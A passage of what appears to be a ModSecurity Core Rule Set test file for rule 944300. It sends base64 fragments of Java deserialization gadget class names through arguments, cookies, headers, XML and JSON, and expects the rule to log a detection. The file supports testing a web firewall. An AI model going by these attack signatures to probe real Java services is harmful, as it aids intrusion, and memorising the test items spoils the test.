stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-248 - desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-249 - desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-250 - desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-251 - desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-252 - desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-253 - desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-254 - desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-255 - desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-256 - desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-257 - desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-258 - desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-259 - desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-260 - desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-261 - desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-262 - desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-263 - desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-264 - desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-265 - desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-266 - desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-267 - desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-268 - desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-269 - desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-270 - desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-271 - desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-272 - desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-273 - desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-274 - desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-275 - desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-276 - desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-277 - desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-278 - desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-279 - desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-280 - desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-281 - desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-282 - desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-283 - desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-284 - desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-285 - desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-286 - desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-287 - desc: "Argument name includes keyword 
